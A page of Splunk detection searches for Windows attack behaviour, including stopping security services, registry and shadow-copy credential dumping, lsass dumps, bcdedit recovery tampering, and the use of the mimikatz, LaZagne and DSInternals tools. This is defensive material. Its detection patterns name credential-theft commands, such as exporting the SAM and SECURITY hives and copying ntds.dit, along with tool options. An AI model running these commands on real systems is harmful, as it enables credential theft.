| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = net.exe OR Processes.process_name = sc.exe) Processes.process="* stop *" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. The search is shipped with a lookup file, `security_services.csv`, that can be edited to update the list of services to monitor. This lookup file can be edited directly where it lives in `$SPLUNK_HOME/etc/apps/DA-ESS-ContentUpdate/lookups`, or via the Splunk console. You should add the names of services an attacker might use on the command line and surround with asterisks (*****), so that they work properly when searching the command line. The file should be updated with the names of any services you would like to monitor for attempts to stop the service.,

Required field

ATT&CK

ID Technique Tactic
T1562.001 Disable or Modify Tools Defense Evasion


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

None identified. Attempts to disable security-related services should be identified and understood.

Reference

Test Dataset


version: 3


Attempted credential dump from registry via reg exe

Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.002
  • Last Updated: 2019-12-02

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=reg.exe OR Processes.process_name=cmd.exe) Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\System* OR Processes.process=*HKLM\\Security* OR Processes.process=*HKLM\\System* OR Processes.process=*HKLM\\SAM*) by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.002 Security Account Manager Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset


version: 4


Attempted credential dump from registry via reg exe

Monitor for execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-6-04

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where process_name="cmd.exe" OR process_name="reg.exe" | where cmd_line != null AND match_regex(cmd_line, /(?i)save\s+/)=true AND ( match_regex(cmd_line, /(?i)HKLM\\Security/)=true OR match_regex(cmd_line, /(?i)HKLM\\SAM/)=true OR match_regex(cmd_line, /(?i)HKLM\\System/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\Security/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\SAM/)=true OR match_regex(cmd_line, /(?i)HKEY_LOCAL_MACHINE\\System/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story


How To Implement

You must be ingesting windows endpoint data that tracks process activity, including parent-child relationships from your endpoints.

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Bcdedit failure recovery modification

This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1490
  • Last Updated: 2020-12-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_failure_recovery_modification_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. Tune based on parent process names.

Required field

ATT&CK

ID Technique Tactic
T1490 Inhibit System Recovery Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators may modify the boot configuration.

Reference


Test Dataset


version: 1


Batch file write to system32

The search looks for a batch file (.bat) written to the Windows system directory tree.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1204.002
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name values(Filesystem.user) as user from datamodel=Endpoint.Filesystem by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | search file_path=*system32* AND file_extension=.bat | `batch_file_write_to_system32_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1204.002 Malicious File Execution


Kill Chain Phase

  • Delivery


Known False Positives

It is possible for this search to generate a notable event for a batch file write to a path that includes the string "system32", but is not the actual Windows system directory. As such, you should confirm the path of the batch file identified by the search. In addition, a false positive may be generated by an administrator copying a legitimate batch file in this directory tree. You should confirm that the activity is legitimate and modify the search to add exclusions, as necessary.

Reference

Test Dataset


version: 1


Certutil exe certificate extraction

This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe Processes.process = "* -exportPFX *" by Processes.parent_process Processes.process_name Processes.process Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `certutil_exe_certificate_extraction_filter`

Associated Analytic Story


How To Implement

Required field

Kill Chain Phase

  • Installation


Known False Positives

Unless there are specific use cases, manipulating or exporting certificates using certutil is uncommon. Extraction of certificate has been observed during attacks such as Golden SAML and other campaigns targeting Federated services.

Reference

Test Dataset


version: 1


Child processes of spoolsv exe

This search looks for child processes of spoolsv.exe. This activity is associated with a POC privilege-escalation exploit associated with CVE-2018-8440. Spoolsv.exe is the process associated with the Print Spooler service in Windows and typically runs as SYSTEM.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1068
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe AND Processes.process_name!=regsvr32.exe by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `child_processes_of_spoolsv_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model. Update the `children_of_spoolsv_filter` macro to filter out legitimate child processes spawned by spoolsv.exe.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

Some legitimate printer-related processes may show up as children of spoolsv.exe. You should confirm that any activity as legitimate and may be added as exclusions in the search.

Reference

Test Dataset

version: 3


Common ransomware extensions

The search looks for file modifications with extensions commonly used by Ransomware

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1485
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | `ransomware_extensions` | `common_ransomware_extensions_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.\ This search produces fields (`query`,`query_length`,`count`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** Name, **Field:** Name\ 1. \ 1. **Label:** File Extension, **Field:** file_extension\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1485 Data Destruction Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is possible for a legitimate file with these extensions to be created. If this is a true ransomware attack, there will be a large number of files created with these extensions.

Reference

Test Dataset


version: 4


Common ransomware notes

The search looks for files created with names matching those typically used in ransomware notes that tell the victim how to get their data back.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1485
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ransomware_notes` | `common_ransomware_notes_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records file-system activity from your hosts to populate the Endpoint Filesystem data-model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

ATT&CK

ID Technique Tactic
T1485 Data Destruction Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a legitimate file could be created with the same name used by ransomware note files.

Reference

Test Dataset


version: 4


Create remote thread into lsass

Detect remote thread creation into LSASS consistent with credential dumping.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-06

Search

`sysmon` EventID=8 TargetImage=*lsass.exe | stats count min(_time) as firstTime max(_time) as lastTime by Computer, EventCode, TargetImage, TargetProcessId | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_remote_thread_into_lsass_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs with a Sysmon configuration, which includes EventCode 8 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools can access LSASS for legitimate reasons and generate an event. In these cases, tweaking the search may help eliminate noise.

Reference


Test Dataset


version: 1


Create local admin accounts using net exe

This search looks for the creation of local administrator accounts using net.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1136.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=net.exe OR Processes.process_name=net1.exe) AND (Processes.process=*localgroup* OR Processes.process=*/add* OR Processes.process=*user*) by Processes.process Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`create_local_admin_accounts_using_net_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1136.001 Local Account Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators often leverage net.exe to create admin accounts.

Reference

Test Dataset


version: 4


Create or delete windows shares using net exe

This search looks for the creation or deletion of hidden shares using net.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1070.005
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processs.process_name=net.exe OR Processes.process_name=net1.exe) by Processes.process Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1070.005 Network Share Connection Removal Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators often leverage net.exe to create or delete network shares. You should verify that the activity was intentional and is legitimate.

Reference


Test Dataset


version: 5


Creation of shadow copy

Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe Processes.process=*shadowcopy* Processes.process=*create*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate administrator usage of Vssadmin or Wmic will create false positives.

Reference


Test Dataset


version: 1


Creation of shadow copy with wmic and powershell

This search detects the use of wmic and Powershell to create a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic* OR Processes.process_name=powershell* Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legtimate administrator usage of wmic to create a shadow copy.

Reference


Test Dataset


version: 1


Creation of lsass dump with taskmgr

Detect the hands on keyboard behavior of Windows Task Manager creating a prcoess dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2020-02-03

Search

`sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp | stats count min(_time) as firstTime max(_time) as lastTime by Computer, object_category, process_name, TargetFilename | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_lsass_dump_with_taskmgr_filter`

Associated Analytic Story


How To Implement

This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 11 for detecting file create of lsass.dmp. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual.

Reference


Test Dataset


version: 1


Credential dumping via copy command from shadow copy

This search detects credential dumping using copy command from a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe (Processes.process=*\\system32\\config\\sam* OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system* OR Processes.process=*\\windows\\ntds\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 1


Credential dumping via symlink to shadow copy

This search detects the creation of a symlink to a shadow copy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.003
  • Last Updated: 2019-12-10

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 1


Credential extraction indicative of fgdump and cachedump with s option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. FGdump is a newer version of pwdump tool that extracts NTLM and LanMan password hashes from Windows. Cachedump is a publicly-available tool that extracts cached password hashes from a system's registry.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND process_name != null AND parent_process_name != null AND match_regex(parent_process_name, /(?i)System32\\services.exe/)=true AND match_regex(process_name, /(?i)cachedump\d{0,2}.exe/)=true AND match_regex(process_path, /(?i)\\Temp/)=true AND match_regex(cmd_line, /(?i)\-s/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of fgdump and cachedump with v option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. FGdump is a newer version of pwdump tool that extracts NTLM and LanMan password hashes from Windows. Cachedump is a publicly-available tool that extracts cached password hashes from a system's registry.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null) | where cmd_line != null AND process_name != null AND process_path != null AND match_regex(process_name, /(?i)cachedump\d{0,2}.exe/)=true AND match_regex(process_path, /(?i)\\Temp/)=true AND match_regex(cmd_line, /(?i)\-v/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of lazagne command line options

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. LaZagne is a tool that extracts various kinds of credentials from a local computer, including account passwords, domain passwords, browser passwords, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003, T1555
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND match_regex(cmd_line, /(?i)all\s+\-oA\s+\-output/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access
T1555 Credentials from Password Stores Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Credential extraction indicative of use of dsinternals credential conversion modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. DSInternals is a collection of PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)ConvertFrom-ADManagedPasswordBlob/)=true OR match_regex(cmd_line, /(?i)ConvertFrom-GPPrefPassword/)=true OR match_regex(cmd_line, /(?i)ConvertFrom-UnicodePassword/)=true OR match_regex(cmd_line, /(?i)ConvertTo-GPPrefPassword/)=true OR match_regex(cmd_line, /(?i)ConvertTo-KerberosKey/)=true OR match_regex(cmd_line, /(?i)ConvertTo-LMHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-NTHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-OrgIdHash/)=true OR match_regex(cmd_line, /(?i)ConvertTo-UnicodePassword/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of dsinternals modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. DSInternals is a collection of PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event, "process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ADDBBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-ADDBDomainController/)=true OR match_regex(cmd_line, /(?i)Get-ADDBKdsRootKey/)=true OR match_regex(cmd_line, /(?i)Get-ADDBSchemaAttribute/)=true OR match_regex(cmd_line, /(?i)Get-ADKeyCredential/)=true OR match_regex(cmd_line, /(?i)Get-ADReplAccount/)=true OR match_regex(cmd_line, /(?i)Get-ADReplBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-ADSIAccount/)=true OR match_regex(cmd_line, /(?i)Get-AzureADUserEx/)=true OR match_regex(cmd_line, /(?i)Get-BootKey/)=true OR match_regex(cmd_line, /(?i)Get-LsaBackupKey/)=true OR match_regex(cmd_line, /(?i)Get-LsaPolicyInformation/)=true OR match_regex(cmd_line, /(?i)Get-SamPasswordPolicy/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • process_name
  • parent_process_name
  • _time
  • process_path
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of mimikatz modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Mimikatz is a collection of tools and modules commonly employed in Windows exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

